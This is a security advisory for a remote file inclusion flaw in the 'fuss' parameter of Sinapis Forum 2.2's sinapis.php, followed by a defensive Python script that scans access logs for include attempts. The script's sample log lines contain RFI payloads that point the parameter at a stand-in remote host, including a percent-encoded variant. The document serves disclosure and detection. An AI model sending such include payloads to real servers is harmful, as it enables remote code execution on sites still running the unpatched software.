Vendor: Sinapis Forum
By: kezzap66345
CVSS: 8.5 (HIGH)
CWE: Remote File Inclusion (RFI)
Product Name: Sinapis Forum
Affected Version From: Sinapis Forum 2.2
Affected Version To: Sinapis Forum 2.2
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Sinapis Forum 2.2 RFI Vulnerability
The Sinapis Forum 2.2 script is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can exploit this vulnerability by injecting a malicious file path into the 'fuss' parameter of the sinapis.php file, which can lead to arbitrary code execution on the server.
Mitigation:
The vendor should release a patch to fix the RFI vulnerability. In the meantime, users are advised to restrict access to the sinapis.php file and sanitize user input to prevent RFI attacks.
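Because no patch exists, reviewing web server logs for abuse of the 'fuss' parameter is a practical interim check. The following is an added example, not part of the original advisory: it assumes Apache/nginx combined-format access logs, and the sample log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URI scheme ("http:", "ftp:", ...) is not a local
# file name. This also matches Windows drive-letter paths, which are equally
# unexpected in an include parameter.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.I)

# Constructed sample lines (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2007:10:01:22 +0000] "GET /forum/sinapis.php'
    '?fuss=http://files.example.invalid/inc.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Mar/2007:10:02:05 +0000] "GET /forum/sinapis.php'
    '?fuss=header HTTP/1.1" 200 2048',
    '203.0.113.9 - - [12/Mar/2007:10:03:41 +0000] "GET /forum/sinapis.php'
    '?fuss=hTTp%3A%2F%2Ffiles.example.invalid%2Finc.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Mar/2007:10:04:00 +0000] "GET /forum/index.php'
    '?ref=http://www.example.org/ HTTP/1.1" 200 1024',
]

def find_rfi_attempts(lines):
    """Return (client, decoded fuss value) for suspicious sinapis.php requests."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/sinapis.php"):
            continue
        # parse_qs percent-decodes once; unquote() again to catch values that
        # were encoded twice to slip past simple string matching.
        for value in parse_qs(url.query, keep_blank_values=True).get("fuss", []):
            decoded = unquote(value)
            if SCHEME.match(value) or SCHEME.match(decoded):
                hits.append((client, decoded))
    return hits

if __name__ == "__main__":
    for client, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{client} sent fuss={value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.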